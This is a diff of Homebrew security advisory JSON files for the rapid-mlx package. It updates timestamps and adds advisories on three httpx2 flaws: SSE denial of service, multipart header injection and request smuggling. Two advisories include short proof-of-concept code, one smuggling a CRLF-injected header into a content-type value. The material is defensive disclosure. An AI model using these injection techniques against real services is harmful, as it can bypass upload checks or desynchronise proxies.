"CVE-2026-44432", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "urllib3", - "subject_version": "2.7.0", - "key": "pkg:pypi/urllib3@2.7.0", - "resource": "urllib3" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-4539.json b/advisories/BREW-rapid-mlx-CVE-2026-4539.json index 3eaca11838..4786407d26 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-4539.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-4539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-4539", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-20T09:36:55Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-5239-wwwm-4pmq", "CVE-2026-4539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pygments", - "subject_version": "2.21.0", - "key": "pkg:pypi/pygments@2.21.0", - "resource": "pygments" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-45409.json b/advisories/BREW-rapid-mlx-CVE-2026-45409.json index 9acce80cd6..f6176d9902 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-45409.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-45409.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-45409", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-20T09:36:55Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-65pc-fj4g-8rjx", "CVE-2026-45409", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "idna", - "subject_version": "3.19", - "key": "pkg:pypi/idna@3.19", - "resource": "idna" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-48522.json b/advisories/BREW-rapid-mlx-CVE-2026-48522.json index 6fb46e09e6..6012a6f01a 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-48522.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-48522.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-48522", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-993g-76c3-p5m4", "CVE-2026-48522", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-48523.json b/advisories/BREW-rapid-mlx-CVE-2026-48523.json index d34953d7a4..9354be8499 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-48523.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-48523.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-48523", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-jq35-7prp-9v3f", "CVE-2026-48523", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-48524.json b/advisories/BREW-rapid-mlx-CVE-2026-48524.json index 7f2166f345..a283f93e57 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-48524.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-48524.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-48524", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-fhv5-28vv-h8m8", "CVE-2026-48524", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-48525.json b/advisories/BREW-rapid-mlx-CVE-2026-48525.json index 6053891c0d..4a0eb4163a 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-48525.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-48525.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-48525", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-w7vc-732c-9m39", "CVE-2026-48525", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-48526.json b/advisories/BREW-rapid-mlx-CVE-2026-48526.json index ff93a00188..f171f63356 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-48526.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-48526.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-48526", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-xgmm-8j9v-c9wx", "CVE-2026-48526", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "pyjwt", - "subject_version": "2.13.0", - "key": "pkg:pypi/pyjwt@2.13.0", - "resource": "pyjwt" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-48710.json b/advisories/BREW-rapid-mlx-CVE-2026-48710.json index 999b4ac9d9..7768c84ade 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-48710.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-48710.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-48710", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-29T09:37:10Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-86qp-5c8j-p5mr", "CVE-2026-48710", @@ -43,14 +43,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-48817.json b/advisories/BREW-rapid-mlx-CVE-2026-48817.json index 9eab4cbc62..533f4e1449 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-48817.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-48817.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-48817", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-x746-7m8f-x49c", "CVE-2026-48817", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-48818.json b/advisories/BREW-rapid-mlx-CVE-2026-48818.json index 8abacfbe70..35bf0ade70 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-48818.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-48818.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-48818", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-wqp7-x3pw-xc5r", "CVE-2026-48818", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-5241.json b/advisories/BREW-rapid-mlx-CVE-2026-5241.json index 24ceb8af17..9383d97ce8 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-5241.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-5241.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-5241", "published": "2026-08-13T17:32:07Z", - "modified": "2026-09-02T09:46:05Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-fgcw-684q-jj6r", "CVE-2026-5241", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "transformers", - "subject_version": "5.15.1", - "key": "pkg:pypi/transformers@5.15.1", - "resource": "transformers" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-52869.json b/advisories/BREW-rapid-mlx-CVE-2026-52869.json index 5a66988e8b..b79b32198a 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-52869.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-52869.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-52869", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-28T13:10:53Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-jpw9-pfvf-9f58", "CVE-2026-52869", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.1.1", - "key": "pkg:pypi/mcp@2.1.1", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-52870.json b/advisories/BREW-rapid-mlx-CVE-2026-52870.json index 993f55be73..60b6b05915 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-52870.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-52870.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-52870", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-28T13:10:53Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-hvrp-rf83-w775", "CVE-2026-52870", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.1.1", - "key": "pkg:pypi/mcp@2.1.1", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-53537.json b/advisories/BREW-rapid-mlx-CVE-2026-53537.json index 5881f72b22..cc5d83f013 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-53537.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-53537.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-53537", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-vffw-93wf-4j4q", "CVE-2026-53537", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-53538.json b/advisories/BREW-rapid-mlx-CVE-2026-53538.json index f96f148c7a..033d64abd9 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-53538.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-53538.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-53538", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-6jv3-5f52-599m", "CVE-2026-53538", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-53539.json b/advisories/BREW-rapid-mlx-CVE-2026-53539.json index d8e3f868c5..71f5cb9e42 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-53539.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-53539.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-53539", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-5rvq-cxj2-64vf", "CVE-2026-53539", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-53540.json b/advisories/BREW-rapid-mlx-CVE-2026-53540.json index c9e7035cdd..1a6c959067 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-53540.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-53540.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-53540", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-v9pg-7xvm-68hf", "CVE-2026-53540", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "python-multipart", - "subject_version": "0.0.32", - "key": "pkg:pypi/python-multipart@0.0.32", - "resource": "python-multipart" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-54282.json b/advisories/BREW-rapid-mlx-CVE-2026-54282.json index 3be5886199..56f6699218 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-54282.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-54282.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-54282", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-jp82-jpqv-5vv3", "CVE-2026-54282", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-54283.json b/advisories/BREW-rapid-mlx-CVE-2026-54283.json index f483211470..2a074e19e7 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-54283.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-54283.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-54283", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-13T17:32:07Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-82w8-qh3p-5jfq", "CVE-2026-54283", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "starlette", - "subject_version": "1.6.0", - "key": "pkg:pypi/starlette@1.6.0", - "resource": "starlette" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-59950.json b/advisories/BREW-rapid-mlx-CVE-2026-59950.json index d083993f3a..67dc2096b2 100644 --- a/advisories/BREW-rapid-mlx-CVE-2026-59950.json +++ b/advisories/BREW-rapid-mlx-CVE-2026-59950.json @@ -2,7 +2,7 @@ "schema_version": "1.7.3", "id": "BREW-rapid-mlx-CVE-2026-59950", "published": "2026-08-13T17:32:07Z", - "modified": "2026-08-28T13:10:53Z", + "modified": "2026-09-10T20:37:33Z", "upstream": [ "GHSA-vj7q-gjh5-988w", "CVE-2026-59950", @@ -42,14 +42,6 @@ "strategy": "registry", "confidence": "high", "upstream_evidence": [ - { - "strategy": "registry", - "ecosystem": "PyPI", - "name": "mcp", - "subject_version": "2.1.1", - "key": "pkg:pypi/mcp@2.1.1", - "resource": "mcp" - }, { "strategy": "registry", "ecosystem": "PyPI", diff --git a/advisories/BREW-rapid-mlx-CVE-2026-84378.json b/advisories/BREW-rapid-mlx-CVE-2026-84378.json new file mode 100644 index 0000000000..bc5a327c86 --- /dev/null +++ b/advisories/BREW-rapid-mlx-CVE-2026-84378.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-rapid-mlx-CVE-2026-84378", + "published": "2026-09-10T20:37:33Z", + "modified": "2026-09-10T20:37:33Z", + "upstream": [ + "GHSA-f2fp-rgf2-35cp", + "CVE-2026-84378", + "PYSEC-2026-3847" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "rapid-mlx", + "purl": "pkg:brew/rapid-mlx" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.11.3" + }, + { + "fixed": "0.12.8" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.10.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Quadratic SSE line buffering can cause CPU denial of service", + "details": "### Summary\n\nHTTPX2's Server-Sent Events (SSE) parser repeatedly copied and rescanned buffered text when a server split one unterminated line across many response chunks. The total work grows quadratically with the length of the line. An attacker-controlled or compromised SSE endpoint can exploit this behavior to consume excessive client CPU.\n\n### Details\n\nBefore version 2.10.0, HTTPX2 combined the complete pending SSE line with each newly received chunk and then scanned the combined text for line separators. If an SSE server sends a long line as many small chunks without a line separator, every chunk causes all previously received text to be copied and scanned again. For `n` fixed-size chunks, this results in O(n²) processing.\n\nThe behavior affects both `httpx2.Client.sse()` and `httpx2.AsyncClient.sse()`. Other response APIs do not use the SSE parsing path.\n\n### Impact\n\nApplications that consume SSE from an attacker-controlled or compromised endpoint can experience excessive CPU usage. A crafted stream can block a synchronous worker or the asynchronous event loop that is consuming it, degrading availability for other work in that process. Confidentiality and integrity are not affected.\n\n### Mitigation\n\nUpgrade to HTTPX2 2.10.0 or later. SSE parsing now accumulates incomplete line fragments and combines them only when necessary, making processing linear in the amount of received data. HTTPX2 2.10.0 also limits buffered SSE events to 1 MiB by default through `max_event_size`.\n\nIf upgrading is not immediately possible, only consume SSE from trusted endpoints and enforce an external size or time budget on the stream.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-f2fp-rgf2-35cp" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84378" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1071" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1117" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/cbfc0e04ef6507da29ccbb3b9c2e5b23dd693414" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.10.0" + } + ] +} diff --git a/advisories/BREW-rapid-mlx-CVE-2026-84379.json b/advisories/BREW-rapid-mlx-CVE-2026-84379.json new file mode 100644 index 0000000000..51012c828f --- /dev/null +++ b/advisories/BREW-rapid-mlx-CVE-2026-84379.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-rapid-mlx-CVE-2026-84379", + "published": "2026-09-10T20:37:33Z", + "modified": "2026-09-10T20:37:33Z", + "upstream": [ + "GHSA-h4x7-gw46-3wm6", + "CVE-2026-84379", + "PYSEC-2026-3848" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "rapid-mlx", + "purl": "pkg:brew/rapid-mlx" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.11.3" + }, + { + "fixed": "0.12.15" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Multipart part header injection via unvalidated file Content-Type and custom headers", + "details": "### Summary\n\nHTTPX2 serializes the per-file `Content-Type` and custom headers supplied through the `files=` tuple API directly into the `multipart/form-data` body without validating custom header names or values. An attacker who can influence upload metadata passed to HTTPX2 can use CR or LF characters to terminate a multipart part header and inject additional part headers or end the part header block early.\n\n### Details\n\nThe three-element file tuple accepts `(filename, content, content_type)`, and the four-element form accepts `(filename, content, content_type, headers)`. `FileField.render_headers()` interpolates the supplied header names and values between CRLF delimiters without validating them.\n\nFor example:\n\n```python\nimport httpx2\n\nrequest = httpx2.Request(\n \"POST\",\n \"https://example.com/upload\",\n headers={\"Content-Type\": \"multipart/form-data; boundary=BOUNDARY\"},\n files={\n \"file\": (\n \"safe.txt\",\n b\"payload\",\n \"text/plain\\r\\nX-Injected: true\",\n )\n },\n)\n\nprint(request.read().decode())\n```\n\nThe generated body contains an attacker-injected part header:\n\n```text\n--BOUNDARY\nContent-Disposition: form-data; name=\"file\"; filename=\"safe.txt\"\nContent-Type: text/plain\nX-Injected: true\n\npayload\n--BOUNDARY--\n```\n\nThe same issue affects names and values in the custom header mapping from the four-element tuple.\n\nField names and filenames are serialized through a separate escaping path and do not permit CRLF header injection.\n\n### Impact\n\nApplications are affected when they pass attacker-controlled upload metadata into the per-file `content_type` or custom `headers` arguments. The receiving server interprets injected lines as genuine multipart part headers. Depending on how that server validates and processes uploads, this can alter part semantics or bypass checks based on part headers.\n\nThis does not split the outer HTTP request: the injected headers are contained within the multipart body. The concrete security impact therefore depends on the downstream multipart parser and application behavior.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.11.0` or later. Patched versions reject forbidden control characters in multipart part header names and values and raise `ValueError` before serializing the request.\n\nIf upgrading is not immediately possible, applications should validate custom multipart header names as HTTP field-name tokens. They should reject NUL, CR, LF, other C0 controls except horizontal tab, and DEL in per-file content types and custom header values before passing them to HTTPX2.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-h4x7-gw46-3wm6" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84379" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1142" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/de96d810ee4e309d118982fe7084a46a2bcd600d" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/releases/tag/v2.11.0" + } + ] +} diff --git a/advisories/BREW-rapid-mlx-CVE-2026-84380.json b/advisories/BREW-rapid-mlx-CVE-2026-84380.json new file mode 100644 index 0000000000..642047d265 --- /dev/null +++ b/advisories/BREW-rapid-mlx-CVE-2026-84380.json @@ -0,0 +1,89 @@ +{ + "schema_version": "1.7.3", + "id": "BREW-rapid-mlx-CVE-2026-84380", + "published": "2026-09-10T20:37:33Z", + "modified": "2026-09-10T20:37:33Z", + "upstream": [ + "GHSA-pf96-p4fj-6566", + "CVE-2026-84380", + "PYSEC-2026-3849" + ], + "affected": [ + { + "package": { + "ecosystem": "Homebrew", + "name": "rapid-mlx", + "purl": "pkg:brew/rapid-mlx" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0.11.3" + }, + { + "fixed": "0.12.15" + } + ] + } + ], + "ecosystem_specific": { + "fix": "bump", + "range_state": "fixed", + "upstream_fixed_in": "2.11.0", + "resource": "httpx2", + "resource_purl": "pkg:pypi/httpx2@2.12.0" + } + } + ], + "database_specific": { + "source": "matched", + "strategy": "registry", + "confidence": "high", + "upstream_evidence": [ + { + "strategy": "registry", + "ecosystem": "PyPI", + "name": "httpx2", + "subject_version": "2.12.0", + "key": "pkg:pypi/httpx2@2.12.0", + "resource": "httpx2" + } + ] + }, + "summary": "HTTPX2: Conflicting Content-Length and Transfer-Encoding headers can be auto-generated", + "details": "### Summary\n\nHTTPX2 can automatically add a `Content-Length` header to a request that already contains a caller-supplied `Transfer-Encoding` header. The resulting HTTP/1.1 request contains both framing headers, which can create an ambiguous message boundary and enable request smuggling or connection desynchronization when processed by intermediaries that disagree about which header takes precedence.\n\n### Details\n\nWhen a request body has a known size, HTTPX2's content encoder returns a default `Content-Length`. `Request._prepare()` applies each default header with `setdefault()`, which only checks whether that same header is already present. It does not check whether the mutually exclusive `Transfer-Encoding` header is present.\n\nFor example:\n\n```python\nimport httpx2\n\nrequest = httpx2.Request(\n \"POST\",\n \"http://example.com/\",\n headers={\"Transfer-Encoding\": \"chunked\"},\n content=b\"test 123\",\n)\n\nprint(request.headers)\n```\n\nThe request contains both:\n\n```text\nTransfer-Encoding: chunked\nContent-Length: 8\n```\n\nOn an HTTP/1.1 connection, the body is serialized using chunked transfer coding while both headers are sent on the wire. This violates HTTP message-framing requirements. Fixed-size byte, JSON, form, and known-length multipart bodies can reach the affected path.\n\nStreaming bodies with an explicit `Content-Length` are not affected in current HTTPX2 releases because the automatically generated `Transfer-Encoding` is already suppressed in that direction.\n\n### Impact\n\nAn attacker may be able to use the conflicting framing headers as a request-smuggling or desynchronization primitive. Exploitation requires an application to pass attacker-controlled request framing headers and associated body data to HTTPX2, use HTTP/1.1, and communicate through a proxy or origin that accepts conflicting headers and interprets them differently from another hop.\n\nDepending on the downstream infrastructure, successful exploitation could interfere with requests sharing a persistent connection, bypass front-end routing or authorization decisions, or poison responses or caches. Applications that do not forward attacker-controlled `Transfer-Encoding` headers are not directly exposed.\n\n### Mitigation\n\nUpgrade to HTTPX2 `2.11.0` or later. Patched versions treat `Content-Length` and `Transfer-Encoding` as mutually exclusive when applying automatically generated request headers.\n\nIf upgrading is not immediately possible, remove `Transfer-Encoding` and other hop-by-hop framing headers from untrusted input before constructing outbound requests. Applications acting as proxies should derive outbound framing from the body rather than forwarding inbound `Content-Length` or `Transfer-Encoding` headers.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L" + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/security/advisories/GHSA-pf96-p4fj-6566" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-84380" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/pull/1137" + }, + { + "type": "WEB", + "url": "https://github.com/pydantic/httpx2/commit/829b93a2393212996f613e635261f777d9ec6eab" + }, + { + "type": "PACKAGE", + "url": "https://github.com/pydantic/httpx2" + }, + { + "type": "WEB", + "url": 